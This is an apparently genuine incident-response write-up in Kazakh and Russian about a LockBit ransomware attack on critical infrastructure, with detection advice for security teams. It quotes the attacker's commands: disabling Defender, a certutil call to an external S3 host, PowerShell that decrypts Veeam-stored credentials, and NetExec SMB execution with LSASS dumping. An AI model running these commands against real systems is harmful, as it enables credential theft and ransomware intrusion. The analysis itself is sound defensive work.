
2025 жылы ransomware неге басқару дағдарысы. Критикалық инфрақұрылымды бүзудың нақты жағдайы

1. Кіріспе
Ransomware ұзақ уақыт бойы тек техникалық мәселе болып қалған жоқ. Бизнес үшін бұл тоқтап қалу тәуекелі, тікелей қаржылық шығындар және уақыт қысымында қабылданған шешімдер.
Біздің тәжірибеміз бойынша, 2024–2025 жылдардағы сәтті шабуылдардың көпшілігі кездейсоқ емес, периметр, мониторинг, резервтік көшіру және инцидентке дайындық тәуекелдер тізбегінің нәтижесі.
Осы ұзақ мақалада RTEAM тобы критикалық инфрақұрылымды бүзудың нақты жағдайын талдайды және тіпті жетілген ұйымдардың мұндай сценарийлерге неге дайын еместігін түсіндіреді.
2. Ransomware бүгін
Ransomware «шифрлеу бағдарламасы» емес, әдетте үш кезеңде дамитын мақсатты операция:
- Инфрақұрылымға кіру.
- Басқаруды басып алу: тіркелгілер, привилегиялар, желі бойынша қозғалу.
- Шифрлеу және шантаж, жиі деректерді параллель ұрлаумен бірге.
Сырттан бәрі қарапайым көрінеді — «шифрледі және ақша сұрады». Тәжірибеде дерлік әрқашан барлау, дайындық және инфрақұрылым бойынша карта бойынша жұмыс бар.
Ransomware қауіпі тек шифрлеуде емес:
- Уақыт қысымы. Тоқтап қалу қымбаттаған сайын нашар шешім қабылдау тәуекелі жоғарылайды.
- Мақсатты тәсіл. Зиян мен выкуп максималды болған жерлерді нысанаға алады.
- «Б жоспары» жоқ. Шабуылдар жиі резервтік көшірмелерге, виртуализацияға және AD-ге бағытталады.
2024–2025 жылдардағы инциденттер бойынша біздің бақылауларымыз:
- ransomware инциденттері шамамен 30%+ өсті,
- компаниялардың жартысынан көбі соңында выкуп төлейді,
- шабуылдардың жартысы критикалық инфрақұрылымға түседі,
- орташа выкуп $1 млн жетеді.
Төлеу де кепілдік бермейді: кілт жұмыс істемей қалуы мүмкін, деректер құпиясы ашылуы мүмкін, компания жиі қайта нысанаға айналады.
Жоғары тәуекел аймағында — критикалық инфрақұрылым: өндіріс, денсаулық сақтау, энергетика, қаржы және көлік, мұнда тоқтап қалу кез келген ресми қауіпсіздік шараларынан қымбат.
3. Нақты жағдай: критикалық инфрақұрылымды бүзуды қалай тергедік
Теория мен статистика маңызды, бірақ ransomware шабуылдарының нақты суретін тек тәжірибе көрсетеді. Төменде RTEAM тобы критикалық инфрақұрылымдағы инцидент бойынша жүргізген тергеуден жағдай.
Мүрәтке жүгіну кезіндегі жағдай
Клиент бізге елеулі мәселемен жүгінді:
- Инфрақұрылымның 99% ransomware зияндысымен шифрленген
- Барлық жүйелер таралуды болдырмау үшін электр қуатынан ажыратылған
- Барлық сыни қызметтер мен бизнес-процестердің жұмысы толығымен тоқтатылған
- Хост ешбір SOC-та мониторингте болмаған
Талдау үшін мыналар берілді:
- NGFW (желілік firewall) логтары
- Жалғыз компрометацияланған және шифрленбеген хостан артефактілер
- Желі архитектурасының схемалары және жарияланған NAT ресурстары тізімі
Алғашқы гипотезалар мен қайшылықтар
Талдаудың бастапқы кезеңінде бізде екі негізгі нұсқа болды:
Гипотеза 1: Белгілі осалдық арқылы компания веб-серверін компрометациялау
Гипотеза 2: VPN пайдаланушыларының бірінің креденшалдарының құпиясы ашылуы және жүйеге кіру үшін пайдалану
Алайда артефактілерді талдағанда сурет жеткілікті тез анық болды.
Логтардағы күтпеген табыстар
NGFW логтарында инфрақұрылым серверлерінің біріне интернеттен тікелей желілік өзара әрекеттерді таптық. Бұл таңқаларлық болды, себебі:
- Клиент бұл хосттың ешқашан интернетке жарияланбағанын мәлімдеді
- Хост жарияланған ресурстар тізімінде болмады
- Желі схемасында ол инфрақұрылымның тереңінде, ішкі қабаттармен қорғалған сияқты орналасқан
Windows логтарында біз сондай-ақ әкімшілік порттар (RDP) арқылы сыртқы IP-адрестен сәтті аутентификацияларды көрдік.
Қорытынды: хост интернеттен қолжетімді болды, клиент бұны білмеді.
4. Терең талдау: шабуылдың толық суреті
Тереңірек қазғанда, бұл нақты инфрақұрылымға дайындалған үйлесілген, көп кезеңді шабуыл екені анық болды.

Кезең 1: RDP кіру нүктесі (T1110.001 Bruteforce: Password Guessing)
Берілген логтар RDP арқылы қашықтан қатынас алу сәтіне дейінгі оқиғаларды қамтамасыз етпеді, жергілікті әкімші тіркелгісінің (Administrator) паролі сөздік сөз (Password123) болғандықтан, қатынас алудың болжамды әдісі сыртқы қызмет паролін қайталау болды.
Кезең 2: Сыни хостты компрометациялау (T1021.001 RDP)
Шабуылшы осылайша толық привилегиялармен жергілікті әкімші тіркелгісінің астында Veeam Backup & Replication серверіне тікелей қатынас алды (Privilege Escalation TA0004).
Veeam — көптеген корпоративтік инфрақұрылымдарда пайдаланылатын резервтік көшіру және disaster recovery шешімі. Әкімші үшін бұл қуатты құрал, ал шабуылшы үшін — алтын кен, өйткені бұл серверде бар:
- Барлық виртуалды инфрақұрылымға толық қатынас
- vCenter қатынасы үшін креденшалдар (барлық VM басқару)
- Резервтік көшірмелері бар барлық қоймаларға қатынас
- Жиі — домендік привилегиялы тіркелгілер
Кезең 3: Барлау және дайындық (TA0007 Discovery)
Желілік қолжетімділік пен Windows/SMB қызметтерін тексеру, порттарды тестілеу:
powershell Test-NetConnection -ComputerName 10.10.120.70 -Port 445,135,137,139Сессияны инвентаризациялау және желілік қосылымдарды тазалау:
whoami; net use; net use * /deleteҚорғанысты өшіру және желілік/диск жолдарын дайындау
powershell Set-MpPreference -DisableRealtimeMonitoring $true Install-WindowsFeature NFS-Client Get-InitiatorPort; fcinfo; Get-IscsiSession; mpclaim -s -dСыртқы S3 ресурсының қолжетімділігін тексеру (пайдалы жүктемені жеткізу мүмкін арнасы)
certutil -url https://s3.akz.redacted.ioNFS және желілік тесттер үшін құралдарды дайындау (iPerf)
Install-WindowsFeature NFS-Client, RSAT-NFS-AdminШарлар мен қатынас құқықтары туралы ақпарат жинау. Veeam.Backup.Manager.exe процесінен PowerShell іске қосу. SAN/FC/iSCSI барлау, MSFC_* WMI кластарына қатынас:
Get-SMBShare, Get-SmbShareAccess
Get-InitiatorPort, fcinfo, Get-IscsiSession, mpclaimКезең 4: Тіркелгі деректерін шығару және шешу (TA0002 Execution)
Мұнда шабуылшы біз тәжірибемізде бұрын кездешпеген техниканы қолданды. Ол Veeam-дан парольдерді дамптау үшін ашық скриптті қолданды.
Процесс үш қадамнан тұрды:
Қадам 1 — Extraction (артефактілерді жинау)
Деректер көздері: 1. Registry HKLM — тұз алу (EncryptionSalt) 2. SQL Database — [dbo].[Credentials] кестесін сұрау 3. Нәтиже — шифрланған бинарлық деректер (Blob)
Қадам 2 — Decryption (шешу)
Мұнда ең қызықтысы болады. Скрипт шешу үшін Veeam заңды кітапханаларын пайдаланды:
powershell Add-Type -Path "...\Veeam.Backup.Common.dll" [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded) [System.Security.Cryptography.ProtectedData]::Unprotect(..., [System.Security.Cryptography.DataProtectionScope]::LocalMachine)- Load: Veeam.Backup.Common.dll (Veeam өз кітапханасы) - Call: [ProtectedData]::Unprotect (стандартты .NET DPAPI) - De-obfuscate: соңғы шешу үшін Veeam шифрлеу әдістері - Result: сақталған барлық тіркелгі деректерінің ашық парольдері
Бұл жергілікті әкімшілік қатынас + заңды кітапхана = Veeam-ға енгізілген барлық құпиялардың толық компрометациясы дегенді білдіреді.
Қадам 3 — Exploitation (латеральды қозғалу)
Барлық креденшалдарды алғаннан кейін шабуылшы nxc.exe (NetExec) құралын мыналар үшін пайдаланды:
- SMB Spray — алынған парольдерді басқа хосттарда тексеру
- Lsass Dump — pass-the-hash шабуылдары үшін NTLM-хештерін алу
powershell .\nxc.exe smb <host> --exec-method smbexec .\nxc.exe smb <host> --exec-method atexecКезең 5: Виртуалды инфрақұрылымды шифрлеу
Мұнда шабуылшылар VMware архитектурасын терең түсінетінін көрсетті:
Қонақ ОЖ деңгейінде VM шифрлеудің орнына (бұл қорғаныс жүйесімен анықталып тоқтатылуы мүмкін), олар қойма деңгейінде шифрлеуді орындады:
Нысана: виртуалды дисктер (VMDK файлдары) Шабуыл деңгейі: қойма (LUN), қонақ ОЖ-ды айналып өту Нәтиже: инфрақұрылымның 99% шифрленген Қосымша әсер: осы LUN-дағы БАРЛЫҚ резервтік көшірмелер де шифрленген
powershell.\vixdisklib-rs.exe --san -h vcsa.redacted.kz ... -s snapshot-10320 "[LUN04] KBU_DB/KBU_DB.vmdk" .\vixdisklib-rs.exe --san -h 10.10.0.22 -u root -s snapshot-14 "[LUN04] .../KBU_DB.vmdk"Сыни сәт: Veeam әрқашан резервтік көшірмелерді инфрақұрылым жұмыс істейтін қоймада сақтайды (әдетте жоғары қатынас құқықтары бар бір LUN-да). Сондықтан резервтік көшірмелер де шифрленді.
veeambackup серверінің D:\ және C:\ дисктерінде lb3.exe (LockBit 3.0) тікелей іске қосылуы тіркелді — шифратор белсендіруінің тән индикаторы
«Кездейсоқ» тергеуге көмек

Міне бізге шабуыл көзін түпкілікті анықтауға көмектескен қызықты сәт.

Өз әрекеттерін траблшутинг кезінде шабуылшы мына команданы қолданды:
nxc.exe smb 127.0.0.1 -u Admin -p Password -M lsassy
nxc.exe smb {PUBLIC IP} -u Admin -p Password -M lsassyОл нысана хосттары қатарында сыртқы IP-адресті көрсетті. Shodan-да тексергенде мыналар анықталды:
- Бұл адрес Қазақстан желісіне тиесілі
- Бұл серіктес компанияның (интегратор/қызмет жеткізуші) IP-і
- Бұл адресте RPC қызметі жарияланған
- Қызметте хостнейм туралы ақпарат көрсетілген — атау компания серверіне сәйкес
- Shodan-да 10-нан астам порт ашық болған
Қорытынды: кіру нүктесі дәл осында болды. RDP, RPC, SMB, Veeam және т.б. ашық порттары бар дұрыс конфигурацияланбаған Windows сервер арқылы.
Шабуыл Kill Chain: әрекеттердің толық тізбегі
Қайта құрылған әрекет тізбегі келесідей болды:
1. Интернет → Сервер партнёра (Казахстан)
2. Scouting → Shodan выявил RPC с информацией о целевой системе
3. Network traversal → Через партнёра доступ к хосту жертвы (Veeam)
4. Initial Access → RDP с административными правами
5. Privilege Escalation → Уже под админом (не требовалась)
6. Persistence → Установка RAT (AnyDesk)
7. Reconnaissance → Анализ сети, поиск критических систем
8. Credential Dumping → Дамп Veeam, получение vCenter, доменных учёток
9. Lateral Movement → SMB Spraying, распространение по сети
10. Impact → Шифрование на уровне хранилища (99% инфры)
11. Extortion → Требование выкупа5. SOC бұл шабуылды қалай болдырмауы мүмкін еді
Егер инфрақұрылым SOC мониторингінде болса, шабуыл бірнеше кезеңдерде кезектесіп — шифрлеуден бұрын көп уақыт бұрын көрінер еді.
Шабуыл кезеңдері бойынша негізгі сигналдар:
- Жария IP-ден RDP брутфорс — көп кіру әрекеттері бойынша анықтау
- Жария IP-ден сәтті кіру — аномальды орналасу және кіру контексті
- Антивирусты өшіру — хоста қауіпсіздік саясатын өзгерту
- Обфускацияланған PowerShell — сигнатуралар мен мінез-құлық бойынша анықтау
- certutil бағдарлама жүктеу үшін — LOLBins анықтау
- AnyDesk орнату — қашықтан қатынас / RAT анықтау
- Veeam тіркелгі деректерін дамптау — осы техникаға арнайы ереже
- SMB spraying — pass-the-hash белсенділігін анықтау
- LSASS қатынасы — жад дамптау әрекеттерін анықтау
Жиыны: шабуылдың әртүрлі кезеңдерінде шамамен 9 сыни ескерту іске қосылар еді.
Олардың бір бөлігін ғана ұстаса да шабуылды тоқтатуға немесе зиянды айтарлықтай азайтуға мүмкіндік береді.
6. Зиянды күшейтетін жиі кездесетін қателер
Бұл жағдайда ransomware инциденттерінде үнемі кездесетін типтік қателерді көрдік:
1. Компаниялар сыртқы периметрдің қаншалықты осал екенін білмейді
Сыни қызметтер сырттан қолжетімді, құжатталмаған және бақыланбайды
2. Жауап беру жоспары жоқ
Шешімдер паникада қабылданады, ал уақыт — шабуылшының негізгі ресурсы.
3. Оқшаулаудың орнына электр қуатын өшіру
Жад деректері мен шабуыл іздерінің жоғалуы тергеуді және қалпына келтіруді қиындатады.
4. Жазық желі
Бір түйменің компрометациясы тез бүкіл инфрақұрылымның компрометациясына айналады.
5. Резервтік көшірмелер формальды түрде бар
Production-мен бірге сақталады және шабуыл сәтінде құтқармайды.
Әр қате сыни және бәрі бірге апаттың болдырмай қойылмайтын сценарийін қалыптастырды.
7. Инцидент анықталғанда дұрыс әрекеттер
Егер инцидент болған болса, негізгі басымдықтар келесідей:
- инфрақұрылымды оқшаулау, электр қуатын өшірмеу
- деректер қирағанға дейін шабуыл іздерін бекіту
- шешім қабылдау тобын тез жинау
- резервтік көшірмелердің күйін бағалау
- кіру нүктесін түсінгеннен кейін ғана қалпына келтіруді бастау
8. Қорытындылар
- Ransomware — это управляемая операция, а не случайный инцидент.
- Зрелость компании не гарантирует защиту без мониторинга и контроля периметра.
- SOC — это способ лишить атакующего времени.
- Бэкапы без изоляции — иллюзия защиты.
- IR-план должен существовать до атаки, а не во время неё.
- Постоянный контроль внешнего периметра (Attack Surface Management)
9. Пайдалы ресурстар
Тереңірек үңілуді қалайтындар үшін:
10. Соңғы сөз
Ransomware — это не «про вирусы». Это про управляемость инфраструктуры, готовность к кризису и способность восстановиться, когда атакующий уже внутри.
Компании, которые рассчитывают, что «нас это не коснётся», почти всегда ошибаются. Делать ставку на одно решение — такая же ошибка.
Разница между управляемым инцидентом и катастрофой почти всегда заключается в подготовке до атаки.
#RTEAM #ОЦИБ #Cybersecurity #Ransomware #InfoSec #CISO #SOC #Blueteam #Veeam #VMware #ThreatIntelligence


